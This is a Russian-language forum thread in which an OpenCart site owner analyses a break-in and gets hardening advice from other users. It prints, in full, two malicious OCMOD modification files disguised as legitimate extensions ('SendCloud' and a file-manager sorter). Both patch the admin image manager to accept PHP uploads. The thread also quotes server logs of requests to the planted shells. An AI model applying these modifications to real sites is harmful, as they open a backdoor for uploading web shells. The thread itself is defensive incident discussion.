Загрузили вирус через админку, установив якобы дополнение

[igorfelix]

Был замечен сегодня вирус на сайте: не работал переход на страницы, работала только главная.

Зашел в файлы, увидел каракули в htaceess, index.php по классике и папки левые..

Снес весь сайт, удалив все файлы, но 3 файла появлялись снова. Смотрел логи, увидел там POST запросы к файлам, но откуда шли так и не нашел, там было пусто.

Отключил полностью пользователя на сервере, файлы так и появлись.. Не понимал откуда идет запуск. Хостер не смог помочь, сказал ищите специалиста. Короче удалил учетную запись, залил бэкап, ура 3 файла перестали появляться. Начал думать какой модуль мог заразу принести. Зашел в менеджер дополнений и вижу интересную картину.. На сайте года 2 никаких дополнений не устанавливалось и тут вижу 17 апреля 2023 год что-то не понятное. 

"SendCloud"  версия 2.16. 17.04.2023

захожу в xml а там вот это содержимое : 

 

<?xml version="1.0" encoding="UTF-8"?>
<modification>
    <name>SendCloud</name>
    <version>2.1.6</version>
    <code>sendcloud</code>
    <author>SendCloud</author>
    <link>https://www.sendcloud.com/</link>
    <!-- Instead of event: catalog/controller/checkout/guest_shipping/save/after -->
    <file path="admin/controller/common/filemanager.php">
        <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>$files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF}', GLOB_BRACE);</search>
            <add position="replace">
                <![CDATA[
			$files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF,php}', GLOB_BRACE);
                ]]>
            </add>
        </operation>
        
                <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>'jpeg',</search>
            <add position="after">
                <![CDATA[
			'php',
                ]]>
            </add>
        </operation>
        
        
        
                   <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>'image/jpeg',</search>
            <add position="after">
                <![CDATA[
			'application/x-php',
                ]]>
            </add>
        </operation>
        
        
        
                
                   <operation error="skip" info="Detects shipping address change during checkout process (for guest customer).">
            <search>$content = file_get_contents($this->request->files['file']['tmp_name']);</search>
            <add position="replace">
                <![CDATA[
			$content = "";
                ]]>
            </add>
        </operation>
        
        
        
        
    </file>
</modification>

 

Могу еще прислать содержимое файлов которые генерировались..  это файл toggige-arrow.jpg якобы картинка, гуглил - не нашел такого вируса.

Подскажите может кто знает, это закинули скрипт который грузит php на сайт ? 

 

Начал смотреть гостей кто заходил в админ 17 апреля . 3 айпишника, посмотрел один Въетнам, другой Новосибирск.. 

 

April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

April 17, 12:42pm time Moscow 194.87.218.48 python-requests/2.18.4

April 17, 12:43pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Роботы ? 

 

log сайта: 

Fri Apr 21 10:26:18.501146 2023] [cgi:error] [pid 22408] [client 195.123.242.ЦИФРА:36848] AH01215: 2023-04-21 10:26:18 1ppl9u-0005pS-G7 1ppl9u-0005pS-G7 no recipients found in headers, referer: https://САЙТ/image/catalog/test.php
2023/04/21 10:27:46 [warn] 20983#20983: *43806092 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518096, client: 195.123.242.37, server: САЙТ, request: "POST /image/catalog/test.php HTTP/1.1", host: "САЙТ", referrer: "https://САЙТ/image/catalog/test.php"
[Fri Apr 21 10:29:32.865527 2023] [cgi:error] [pid 23023] [client 195.123.242.ЦИФРА:37492] AH01215: PHP Notice:  Undefined variable: _GET in /var/www/путь/data/www/САЙТ/image/catalog/inputs.php on line 1
2023/04/21 10:30:30 [warn] 20983#20983: *43806920 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518114, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /image/catalog/inputs.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/"
2023/04/21 10:34:56 [warn] 20983#20983: *43807668 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518127, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /catalog/model/localisation/localisation/index.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/"

 

Видимо на сайте стоял простой пароль и смогли подобрать, зайди в менеджер дополнений и загрузить xml. А проявился вирус 21 апреля.

Edited April 21 by igorfelix

[buslikdrev]

 

[igorfelix]

Я понял код, в файловый менеджер разрешили загрузку php файлов, и загрузили вирус.

[igorfelix]

Проблема повторилась на других сайтах. 
 

в БД появляется запись

(61, 'File Manager Sort By Upload Date', 'File Manager Sort By Upload Date', 'sezerural.com', '2.x-3.11', '', '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<modification>\r\n	<name>File Manager Sort By Upload Date</name>\r\n	<code>File Manager Sort By Upload Date</code>\r\n	<version>2.x-3.11</version>\r\n	<author>sezerural.com</author>\r\n	<file path=\"admin/controller/common/filemanager.php\">\r\n		<operation error=\"log\">\r\n			<search position=\"replace\"><![CDATA[\'jpeg\',]]></search>\r\n			<add><![CDATA[\'php\',\'jpeg\',]]></add>\r\n			\r\n		\r\n			\r\n			\r\n		</operation>		\r\n		\r\n		<operation error=\"log\">\r\n			<search position=\"replace\"><![CDATA[\'image/jpeg\',]]></search>\r\n			<add><![CDATA[\'image/jpeg\',\'application/x-php\',]]></add>\r\n			\r\n		</operation>\r\n		\r\n	</file>	\r\n</modification>\r\n', 1, '2023-04-12 19:05:54');

 

Опять разрешают заливку php через стандартный менеджер изображений в опенкарте. 

 

Устанавливают расширение xml

Скорее всего из-за моего простого пароля попали в админку. 

[igorfelix]

Странно что ни у кого такого нет. Гуглил. не нашёл. Массовый пробег  по сайтам был после 15 апреля 2023. 

[openprice]

Цитата

Скорее всего из-за моего простого пароля попали в админку. 

 

это в 99% случаев, когда вирусню льют через админку

там без разницы потом, что за код залили.

сменить пароли от админки, бд и фтп. потом почистить от появившейся заразы

должно помочь

[igorfelix]

Поставил ещё антикапчу от гугла на вход в админку. 

[markimax]

В 26.04.2023 в 17:57, igorfelix сказав:

Поставил ещё антикапчу от гугла на вход в админку. 

Та закрий ти її по IP

[igorfelix]

26.04.2023 в 21:58, markimax сказал:

Та закрий ти її по IP

Блокировать по ip ? Так если в админку лезут используя разные ip и vpn. 

[openprice]

26.04.2023 в 17:58, markimax сказал:

Та закрий ти її по IP

 

а не прощё её банально переименовать?

и лезть будет просто некуда

[niger]

07.05.2023 в 16:39, openprice сказал:

 

а не прощё её банально переименовать?

и лезть будет просто некуда

навіть Гугл рекапатча на пароль допомагає. 

[igorfelix]

08.05.2023 в 10:27, niger сказал:

навіть Гугл рекапатча на пароль допомагає. 

А может ли бот сбрасывать пароль через админку и каким-то образом проходить кугл капчу с картинками, заходить в админку и устанавливать через менеджер дополнений вирусный модификатор ?